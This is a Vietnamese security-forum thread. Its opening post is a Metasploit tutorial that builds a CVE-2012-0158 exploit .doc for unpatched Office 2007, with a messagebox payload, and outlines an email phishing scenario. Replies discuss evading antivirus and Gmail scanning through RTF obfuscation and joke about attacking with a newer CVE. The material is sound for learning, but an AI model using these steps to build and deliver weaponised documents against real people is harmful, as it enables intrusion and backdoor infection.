Giới thiệu công cụ Metasploit

Thảo luận trong 'Exploitation' bắt đầu bởi tmnt53, 10/03/17, 02:03 PM.

  1. tmnt53

    tmnt53 Guest

    Metasploit là một framework cung cấp môi trường để pentest các hệ thống phần mềm, mạng. Metasploit = Meta + Exploit, ở đó meta thể hiện sự trừu tượng hóa => một framework thiết kế cho các thao tác với exploit. Metasploit lưu trữ một database cho các exploit public hiện có, và cung cấp sẵn các công cụ để triển khai các exploit đó. Nhờ đó bạn có thể sử dụng metasploit để tạo ra các payload đi pentest các hệ thống.
    Metasploit có thể cài đặt trên Windows, Linux, Mac OS, nhưng phổ biến nhất vẫn là Linux. Phiên bản Kali có cài đặt sẵn metasploit. Hôm nay mình sẽ giới thiệu metasploit tới các bạn qua một demo nhỏ: tạo payload khai thác CVE-2012-0158.
    CVE-2012-0158:
    Đây là lỗ hổng bảo mật của Microsoft Office được công bố vào năm 2012. Lỗ hổng cho phép hacker thực thi lệnh từ xa thông qua tệp tin doc hoặc rtf. Lỗ hổng này tồn tại trên các phần mềm: Microsoft Office 2003, 2007, 2010.
    Mình sẽ khai thác lỗ hổng này trên Windows 7, với Microsoft Office 2007. Các bạn có thể tải phiên bản office 2007 tại: http://sinhvienit.net/forum/download...ck.208135.html
    Mở một terminal, và mở chế độ console của metasploit: msfconsole [​IMG]

    1. Chon module exploit​
    a. Tìm kiếm exploit của CVE này bằng lệnh: search CVE-2012-0158​
    [​IMG]

    b. Chọn module exploit tìm được bằng lệnh: use exploit/windows/fileformat/ms12_027_mscomctl_bof​
    [​IMG]

    2. Cài đặt tùy chọn cho exploit​
    a. Xem các tùy chọn: show options
    [​IMG]

    b. Cài đặt tùy chọn:​
    Để đổi tên file thành “CVE-2012-0158.doc”, ta thực hiện: set FILENAME CVE-2012-0158.doc​
    [​IMG]

    3. Cài đặt payload cho exploit​
    a. Ta xem những payload có thể dùng bằng lệnh: show payloads
    [​IMG]

    b. Trong các payload liệt kê ra, ta chọn windows/messagebox để file mã độc chỉ biểu diễn một thao tác đơn giản là bật lên một messagebox: set payload windows/messagebox​
    [​IMG]
    [​IMG]

    c. Xem các tùy chọn của payload: show options​
    Để cài đặt một tùy chọn, chẳng hạn TEXT = “You are hacked”, ta thực hiện: set TEXT You are hacked​
    [​IMG]

    4. Tạo file khai thác​
    Bước cuối cùng là tạo ra file .doc ta cần bằng lệnh: exploit
    [​IMG]



    Giờ ta test file CVE-2012-0158.doc tạo ra được, bằng cách đưa file ra máy thật (mình tạo file payload trên máy ảo Kali) và mở bằng office 2007 vừa cài đặt. Chú ý là office phải chưa được update thì mới có lỗ hổng. Và chú ý tắt Windows Defender hoặc các chương trình diệt virus khác đi.

    [​IMG]



    Và hình ảnh trên là kết quả thu được, "You are hacked"!

    Trong thực tế, một kịch bản khai thác có thể là:
    1. File mã độc trên được hacker gắn backdoor và gửi tới nạn nhân qua email.
    2. Email của nạn nhân là mail riêng của công ty, chẳng hạn, và không có cơ chế quét mã độc như Gmail.
    3. Máy tính của nạn nhân bị tắt chức năng Windows Defender, và không cài đặt phần mềm anti-virus nào cả.
    4. Nạn nhân mở mail ra, đọc file văn bản và lập tức nhiễm backdoor.
    Trong thực tế, CVE-2012-0158 vẫn được các hacker sử dụng nhiều, mặc dù lỗi này đã có từ lâu, và đa số các phần mềm anti-virus đều quét được. Nói chung, các bạn không nên mở file lạ từ Internet, email , và đừng tắt Windows Defender hay phần mềm anti-virus đi nhé.
     
    Chỉnh sửa cuối: 10/03/17, 02:03 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    Sugi_b3o and sunny like this.
  2. babyviolet

    babyviolet W-------

    Tham gia: 06/03/16, 05:03 PM
    Bài viết: 15
    Đã được thích: 8
    Điểm thành tích:
    8
    Trên thực tế lỗ hổng này vẫn được sử dụng phổ biến bởi:
    1. Mã khai thác chạy ổn định trên bản office 2007, 2010 chưa update.
    2. Dễ dàng bypass Antivirus
    Ngay cả gmail cũng bị bypass bình thường.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. tmnt53

    tmnt53 Guest

    Bạn chắc không, vì lỗi này lâu lắm rồi

    Bạn cho mình tài liệu dẫn chứng với. Gmail bản chất cũng là dùng các phần mềm diệt virus thôi, nên nếu bypass được các Antivirus thì qua bình thường.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. babyviolet

    babyviolet W-------

    Tham gia: 06/03/16, 05:03 PM
    Bài viết: 15
    Đã được thích: 8
    Điểm thành tích:
    8
    Bạn chắc không, vì lỗi này lâu lắm rồi: Lỗi này năm 2012 nhé (Office 2007 và 2010 bản thân nó đã nói nên cái năm rồi)

    Có một số tài liệu bạn có thể tham khảo:
    https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html
    http://www.decalage.info/rtf_tricks

    Đúng là bypass gmail bản chất là bypass Antivirus (gmail chỉ dựa trên một số AV nổi tiếng chứ không phải là tất cả).
    RTF bị bypass bởi cấu trúc phức tạp, cho phép lồng các keyword vào nhau, cho phép mix giữa binary và hex, unicode và ascii,...
    Bằng cách biến đổi chèn, lồng các object, keyword một cách hợp lý vào những offset hợp lý thì sẽ bypass được AV.

    Một mẫu cụ thể bypass Gmail thì tôi không thể cung cấp được vì lý do bảo mật, Thân.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. tmnt53

    tmnt53 Guest

    À mình hiểu sai ý bạn. Mình tưởng bạn bảo phiên bản 2010 chưa có bản vá cho lỗi này :v
    Mình cảm ơn nhé, thông tin rất bổ ích!
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. tmnt53

    tmnt53 Guest

    Mà liệu có bypass được Windows Defender không babyviolet thằng này do chính Microsoft làm nên mình nghĩ không thể??
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. babyviolet

    babyviolet W-------

    Tham gia: 06/03/16, 05:03 PM
    Bài viết: 15
    Đã được thích: 8
    Điểm thành tích:
    8
    Hỏi khó quá :3
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    tmnt53 thích bài này.
  8. WhiteHat News #ID:2017

    WhiteHat News #ID:2017 VIP Members

    Tham gia: 20/03/17, 10:03 AM
    Bài viết: 351
    Đã được thích: 111
    Điểm thành tích:
    43
    khi tạo ra payload nhưng không thấy ở đâu anh ơi ???
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. tmnt53

    tmnt53 VIP Members

    Tham gia: 25/04/15, 09:04 AM
    Bài viết: 127
    Đã được thích: 98
    Điểm thành tích:
    28
    Khi em tạo ra payload nó sẽ hiện đường dẫn của payload ra mà. Capture.PNG
    Như trong dòng anh tô màu đỏ ấy. Chú ý folder .msf4 là folder ẩn, để nhìn thấy em phải ls /root/ -a (thêm tham số -a) thì mới thấy được
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  10. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 657
    Đã được thích: 745
    Điểm thành tích:
    93
    em bị lỗi ở phần đăng kí để có thể mở
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  11. sunny

    sunny VIP Members

    Tham gia: 30/06/14, 10:06 PM
    Bài viết: 1,834
    Đã được thích: 862
    Điểm thành tích:
    113
    Em có thể nói rõ câu hỏi hơn được không?
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  12. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 657
    Đã được thích: 745
    Điểm thành tích:
    93
    Thuownhf sau khi cài đặt xong người ta luôn vào thư mục lưu để mở file acces .... để đk ms có thẻ mở đc chương trình
    nhưng em mở lên thì gi lỗi trang không thể ....
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  13. tmnt53

    tmnt53 VIP Members

    Tham gia: 25/04/15, 09:04 AM
    Bài viết: 127
    Đã được thích: 98
    Điểm thành tích:
    28
    Anh không hiểu lỗi của em, anh không phải đăng ký gì mà. Cứ mở msfconsole lên thôi. Em còn bị lỗi không, up ảnh anh coi
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  14. hoangthai308

    hoangthai308 W-------

    Tham gia: 17/01/14, 10:01 PM
    Bài viết: 6
    Đã được thích: 3
    Điểm thành tích:
    3
    Lỗi này được vá từ lâu, nhưng người dùng VN chủ yếu sài hàng lậu, ko update vá lỗi thường xuyên, do vậy lỗ hổng vẫn tồn tại rất nhiều.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    whf and tmnt53 like this.
  15. tmnt53

    tmnt53 VIP Members

    Tham gia: 25/04/15, 09:04 AM
    Bài viết: 127
    Đã được thích: 98
    Điểm thành tích:
    28
    Chuẩn. Mới đây lại có lỗi CVE-2017-0199 nữa, khai thác được trên rất nhiều phiên bản. Tấn công thử chắc được nhiều lắm.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    hoangthai308 thích bài này.